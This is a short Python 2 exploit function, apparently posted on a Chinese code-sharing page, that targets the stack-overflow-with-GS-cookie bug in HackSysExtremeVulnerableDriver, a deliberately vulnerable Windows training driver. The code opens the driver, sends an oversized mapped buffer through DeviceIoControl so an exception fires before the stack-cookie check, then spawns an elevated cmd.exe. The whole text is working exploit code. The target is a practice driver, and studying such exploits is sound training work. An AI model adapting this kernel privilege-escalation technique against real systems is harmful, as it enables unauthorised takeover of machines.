def trigger_stack_overflow_GS():
dwReturn = c_ulong()
driver_handle = kernel32.CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver", 0xC0000000,0, None, 0x3, 0, None)
if not driver_handle or driver_handle == -1:
print "[!] Driver handle not found : Error " + str(ctypes.GetLastError())
sys.exit()
buffer_ptr, buffer_size = create_map_file()
print "[+] Sending malicious buffer"
print "[+] Triggering vuln .."
# Note buffer_size + 4 : +4 resides outside the mapped file to trigger an exception when memcpy the region
# before GS check, which BSODs box
kernel32.DeviceIoControl(driver_handle, 0x222007, buffer_ptr, buffer_size + 4, None, 0,byref(dwReturn) , None)
if shell.IsUserAnAdmin():
print "[*] Enjoy Elevated Privs !\r\n"
os.system('cmd.exe')
else:
print "[!] Exploit did not work. Re-run it!"
HEVD_stackoverflowGS.py 文件源码
python
阅读 25
收藏 0
点赞 0
评论 0
评论列表
文章目录
